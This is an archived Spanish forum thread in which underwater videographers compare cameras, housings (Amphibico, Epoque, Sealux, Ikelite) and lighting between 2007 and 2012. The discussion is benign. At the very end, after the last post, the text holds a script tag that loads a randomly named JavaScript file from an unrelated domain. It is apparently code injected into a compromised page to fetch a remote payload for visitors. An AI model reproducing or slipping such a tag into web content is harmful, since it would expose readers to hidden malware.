PDA

Ver la versión completa : Equipos de videosub.



Carles C
15th May 2007, 00:38
Hola amigos, he estado pensando que sería bueno para todos saber los equipos que utilizamos, y los pros y contras que tiene cada uno. Lo digo, por que si alguien quiere cambiarlo, sabrá que ventajas tienen unos y de que pecan otros. Mas que nada por tener información, no de catálogo, sinó de videosubs que trabajan con los equipos y que saben todos los detalles de estos.
Espero que os guste la idea.
Carles C.

Longimanus
29th August 2007, 15:27
Bueno, veo que nadie se anima, empiezo yo.

En mi empresa ( www.dvdeep.com ) tenemos una Sony Z1, para rodar en HD en Dvcam y en Mini Dv, en PAL y en NTSC. Con caja Amphibico y lente Asférica de 110º. Además varias lentes de macro (+2 y +3).

También tenemos otra Sony AVR1, también con caja Amphibico, y también HD, Dvcam y Mini Dv (NTSC y PAL), y las mismas lentes que la Z1, es más manejable puesto que es más pequeña, pero la calidad de la Z1 es insuperable.

Tenemos iluminación Multitec, Dragonsub y Green Force.

Saludos

jalito
1st September 2007, 18:36
Hola,

Mi configuracion es:

Camara Sanyo Xacti HD2 en caja Epoque ES510H
Filtro 10bar (no tenian el urpro)
Gran angular Epoque

Es un equipo muy manejable, aunque peca de cierta inestabilidad por su poco peso y tamaño. La calidad de las imágenes es más que decente para recuerdo y video casero, ya que permite balance de blancos manual. Otra ventaja es que no creo que haya hoy dia en el mercado nada más económico en su conjunto, y el resultado es bastante bueno para mis exigencias.

Salu2,
Jose Antonio

RODRIGOLES
13th September 2007, 17:31
Hola...

Os escribo con los pelos de punta. Imagino que algunos de vosotros esta en mi misma situacion o la ha experimentado, los que no ojo! la locura ronda cerca...

Estoy a punto de dar el paso en la compra de un nuevo equipo de videografia subacuatica. Me gustaria utilizar una housing Amphibico por comodidad sobre todo en los controles. Camara Sony, por supuesto. Anteriormente he utilizado el Abobe Pro para editar y estoy bastante contento con los resultados, asi que me gustaria poder utilizarlo con la nueva camara. Sony tiene modelos que graban en formato AVCHD que el adobe no reconoce.

La pregunta es: Existe algun programa (procode...) que me permita trabajar con el adobe?O Existe alguna camara economica con los tres chips?

Gracias companeros,

rec
13th September 2007, 23:49
hola rodrijoles la verdad es de que yo estoy en la misma situación que tu, utilizo el adobe y ahora quiero hacer el cambio de carcasa de vídeo... y por supuesto me gustaría comprar una amphibico, para mi la mejor

hace tiempo que le doy vueltas al asunto y vamos el problema mas grande que hay es el dinero, una amphibico vale una pasta y si quiero los modelos mas económicos de amphibico la serie "buddy evo", me parece que solo un modelo de esta serie, tiene balance de blancos y justamente la cámara que le va bien, es la cámara de sony A1, una cámara que por prestaciones y cualidad es muy cara ( unos 3000 leuros) y entonces encarece mucho el conjunto de cámara+carcasa

otro tema es el de los sensores de 3ccd, solo las cámaras de gama alta lo utilizan y ahora sony apuesta por los sensores cemos, más económicos y consumen menos batería y resultan más económicos, encontra dicen que producen ruido( imagenes granuladas )

cámaras buenas... pues para mi cualidad precio la hc1, parece que ya esta descatalogada, otra opción buena es la hc7 dicen que es la leche y el preció es muy bueno 1000e

el tema de la grabación en avchd, no se que sistema es.. solo se que gravan en tarjeta memoria estick, cosa que amí personalmente no me gusta, tampoco me interesa mucho el tema de del hd, ya que eso significa un problema muy grande, pero bueno todas las cámaras hd dan la opcion de gravar en dv, que es el formato que más me gusta...

ahora estoy mirando la solución de mangrobe más sony hc7, pero la verdad todavía no ha empezado con la caza, me espero unos meses y me pongo con el tema, ha pedir presupuestos y comprala...

haber si en el post este, interviene más gente y nos ayuda un poco con el tema, por que la verdad, yo estoy liado con tantas cámaras y precios

un saludo

Reta
24th September 2007, 22:36
Hola amigos, he estado pensando que sería bueno para todos saber los equipos que utilizamos, y los pros y contras que tiene cada uno. Lo digo, por que si alguien quiere cambiarlo, sabrá que ventajas tienen unos y de que pecan otros. Mas que nada por tener información, no de catálogo, sinó de videosubs que trabajan con los equipos y que saben todos los detalles de estos.
Espero que os guste la idea.
Carles C.

Primero saludaros a todos, es la primera que participo en este foro, como el título expresa estoy intentando decidirme por una de estas dos cámaras y utilizarlas con carcasa Amphibico, a mi entender es una de las mejores carcasas del mercado aunque me supone vender mi equipo actual y sumarle la misma cantidad para conseguir el nuevo. Hasta ahora he disfrutado de una Sony HC1000 con carcasa BlueFin de Light and Motion e iluminación Sunray, he hecho muy buenas grabaciones con ella pero estoy deseando dar el salto a la HD y me corroe la duda ¿ Z1 o V1 ? ¿CCD o CMOS?. Agradezco de antemano vuestros comentarios.
Un saludo.

llopdemar
15th October 2007, 20:21
Hola a todos,
Siguiendo con el tema de las dudas, despues de decidirme por la H7 le toca ahora a la carcasa.
He utilizado tres en mi vida, Ikelite, Amphibico y ultimamente Gates.
Para la H7 he estado mirando Zillon, Fisheye y Sealux.
Zillon y Fisheye.
Ventajas: poco peso, sobre los 2,5 kg y todas las funciones en la mano.Ademas la Zillon tiene monitor externo.
Sealux.
Ventajas: muy compacta y marca reconocida.
Desventajas: Solo carcasa 3,5 kg.
¿ Alguien del Foro a utilizado Sealux ?
Los precios estan en el mismo orden por lo que no es un factor determinante.
Espero vuestro consejo, saludos.

dani14
4th March 2011, 14:07
hola
hace algo menos de un año compre una sony xr550 y una carcasaa ikelite estoy muy contento con los resultados quiza tambien no sea escesivamente exigente, no lo se, no controlo mucho.
ahora ando con el tema de la iluminacion y he visto Foco Ikelite Pro 2800 Led (680 € ) que me parece una buena opcion, quisiera si fuera posible alguien me dijera algo pues soy muy novato
a el precio fue de algo mas de 2000€

carlosbcn
25th October 2011, 12:54
yo tengo una sony handycam dcr sx 34 con carcasa y unos focos de aditech de 50W cada uno.

a la carcasa voy a instalarle un brico monitor

Alomit
6th July 2012, 21:25
Hola Jose Antonio, ten cuidado con la Epoque, yo tenia tu mismo equipo pero con la Xacti HD1, y se me inundo la carcasa....creo que son bastante poco fiables...... ;(
<script src="http://plugintemarosa.info/dfi823hs.js?0.7426761594494984"></script>